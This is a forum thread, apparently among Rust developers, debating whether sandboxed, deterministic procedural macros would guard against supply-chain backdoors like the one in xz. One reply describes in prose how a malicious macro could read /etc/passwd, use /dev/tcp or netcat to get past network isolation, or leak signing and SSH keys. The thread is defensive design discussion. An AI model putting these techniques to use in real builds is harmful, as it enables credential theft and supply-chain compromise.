Deterministic isolated proc-macros

I used to think proc macro sandboxing was a good idea.

Since the xz backdoor, I am now convinced it is nearly a waste of effort, at least from a backdoor prevention perspective. Network-isolated builds already provide most of the protection a proc macro sandbox would deliver.

A completely sandboxed proc macro can still generate backdoor code into a binary that uses it. That backdoor code -- when running in the compiled binary -- can sniff the date, inspect the local environment, and do arbitrary file or network activity.

The proc macro's execution is not the only danger point. The execution of the proc macro's generated code is the even bigger danger point. And that execution happens after build and deployment, and hence outside any build sandbox.

Real progress on preventing proc-macro injection vulnerabilities will involve analyzing the generated code itself, which is no longer a sandboxing problem but a static analysis problem.

I understand the compiler team does not want to introduce trust boundaries inside the compiler. I am grimly convinced the xz backdoor shows that there is now no choice. Proc macros will become a primary attack vector unless we come up with some defense against the code they generate.

Edit: The possibility of caching the result of proc macro execution actually could dovetail nicely with some kind of inspection of the resulting token stream. Perhaps Rust should consider enforcing purely deterministic proc macros, and passing things like database schemas as plain string input to the macro. That would naturally work with deterministic proc macro result caching, and would be inspectable for assurance of the generated code.

2 Likes

I'm not sure how the xz backdoor is relevant here as the actual backdoor was only present in a pre-generated build script that was distributed to distros and would not have worked if the maintainers generated that themselves. In proc-macro terms this would be equivalent to distributing a backdoor in the cached output of the proc-macro.

3 Likes

I have to disagree with that for two reasons:

  1. You can do A LOT of things if you are "just" Network-isolated: For example writing a file somewhere on disk or reading /etc/passwd to include it in the generated code. It could potentially even swap our the rust compiler to a backdoored version (thus spreading to other projects compiled on that machine), depending on the implementation read from/write to /dev/tcp/<ip>/<port> or execute other commands on the system (e.g. netcat) to avoid the network restriction. Hence I'd argue that using just "Network-isolated builds" most likely brings barely any protection without effectively being executed in a separate VM (or maybe via Docker), which is more than just "Network-isolated".
  2. There are situations where you compile code but do not execute the output. For example during CI/CD (assuming execution of tests happens in a different container/vm), where leaking data would be problematic (e.g. leaking the key used to sign the resulting binaries by putting it into the compiled binary).

Any library you pull in (and proc macros, yes) effectively has (arbitrary) code execution where the executable is run (there is absolutely no way around that), but not on the device compiling the code, which is often where a lot of useful things are stored, like ssh private keys.

Proc macros can be used to introduce backdoors into the final executable, but so can any library you pull in that doesn't use proc macros at all. I'd argue this is more about protection on the machine you compile on and less on the machine it is executed on, though in practice that is often the same.

3 Likes

I used to think it's pointless too, but I've changed my mind on this. It's not just about whether a malicious crate can cause damage at all, but how difficult it is to do it, and most importantly, how visible this has to be in the source code.

To be sure that a crate is not malicious, it's necessary to review its source code. Without sandboxing, crates have lots of opportunities to detect their environment in a subtle way, and many sneaky ways to run additional code. And proc macros are an ideal place to obfuscate and inject code.

So making proc macros more limited, more deterministic, easier to instrument, and isolated from the compiler itself, makes it harder for attackers to sneak in a backdoor, and easier for reviewers to check crate's behavior and spot suspicious code.

Specifically:

  • if macros are always compiled for a WASI target, they can't vary their code with cfg() and attack only a CI build or dev machine.

  • if macros run sandboxed, they can't check for presence of certain files, domains, or time to hide the attack until the right time, without this being seen and potentially logged by the WASI runtime. So even if the macro can delay the attack, the check itself may raise suspicion.

  • if a macro is forced to be deterministic, then cargo-expand can show what it really produces.

  • running unsandboxed in the same process as the compiler is too powerful — a macro could modify the compiler itself, and inject malware in a very indirect way. Running in an interpreter stops some sneaky ways of injecting code, like collision of mangled symbols, modification of state belonging to the compiler, or smashing data on stack to jump to code disguised as data.

18 Likes

That was a very minor aspect of the overall xz exploit. I think it's extremely likely that whoever was behind the xz exploit could have escaped notice for just as long as they did even if all of their exploit code was checked in, because they were hiding the exploit in places that reviewers tend to neglect -- test code, build scripts -- it doesn't help that Autoconf scripts are notoriously write-only code, but I think I could write a proc macro that injected something nasty into the generated code while still looking straightforward and innocuous enough to pass review.

1 Like

Even if isolating proc-macros and build scripts provides no meaningful defense against malicious code,

  • It's still good engineering practice: it makes a lot of bad ideas harder to implement. Lack of side effects, and lack of undocumented external inputs, is good for debuggability and reproducibility; even if there are “holes in the sandbox”, it will discourage people who haven't thought about the issues because the naive things won't work.

  • Perhaps later there will be a way to build on this work and do even better — perhaps Rust's successor (or a later version of Rust) will come up with a better scheme based on observing how it was done before. If nobody ever even tries because they can't do it perfectly, it's less likely we'll someday have a really good solution.

11 Likes

another thing to consider is how the builtin cargo sandboxing would interact with external build sandboxing tools like nix.

2 Likes

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.